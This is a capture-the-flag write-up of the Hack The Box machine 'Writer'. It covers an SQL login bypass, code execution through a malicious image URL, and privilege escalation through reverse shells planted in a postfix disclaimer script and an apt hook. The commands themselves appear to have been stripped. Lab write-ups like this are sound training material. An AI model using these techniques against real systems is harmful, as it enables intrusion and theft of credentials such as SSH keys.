Writer is a Medium box from HTB and created by TheCyberGeek. This box features a website with a SQL login bypass and img_url parameter exploit allowing us to execute code. Once on the box we find a postfix and apt exploit allowing us to get root.

Before I begin each machine I kick off a full port nmap scan. This scan profile should normally not be used with the -T5 as you might miss/get incorrect information/results:

Reviewing the results I can see Ports 22/80/445 open. Starting with SMB I use enum4linux to pull some enumeration and directly access the share. I have no rights to the folders but I do find some accounts/users:

Next I navigate over to the website which is sitting on Port 80. I’ve recently been trying to use ffuf more in my day to day but highlighted Feroxbuster as well:

Story Bank website sitting on Port 80.

OR

Running the directory scans shows an administrative directory. Navigating to it shows a login page. I use admin/password in the fields and capture the request in Burp Suite. I change the parameters to match for easier identification. I then copy the request and create a req.txt. I use ffuf to fuzz the username/password fields for possible SQL injection or login bypass.

I get a hit:

Story Bank Dashboard after the SQL Login Bypass.

After logging into the environment I am presented with a dashboard. I can see an area to edit stories. After some trial and error I realize that if I intercept the request with Burp Suite I can also the image URL to execute the code added to the end of the image:

I click Edit Story and click Browse. I upload the exploit.jpg (created in the steps above) then browse to HERE to verify. Next, I upload a second image and intercept in Burp suite. Change our img_url request with:

Using the Edit Story to upload a malicious jpg on HTB Writer.

A few seconds later the shell pops. I loaded LinPEAS onto the box and notice:

/etc/postfix/disclaimer running every 5mins. I’ve previously run across a similar privesc regarding disclaimer. Reviewing the script I add in a reverse shell:

I then create a basic send mail script based off HERE and upload them both to the server:

Pulling them both to the server in a folder called crx. Once pulled I run the send mail script alongside the disclaimer copy noting the task above happens frequently:

On my attack machine I kick off a reverse shell after transferring the files:

Once on the virtual machine I grab John’s SSH key and log back into the box:

I run LinPEAS again and notice apt running as root. I can also see that I can write to the file.:

GTFOBins confirms my hunch. I echo a one-liner bash reverse shell into the file and wait the shell.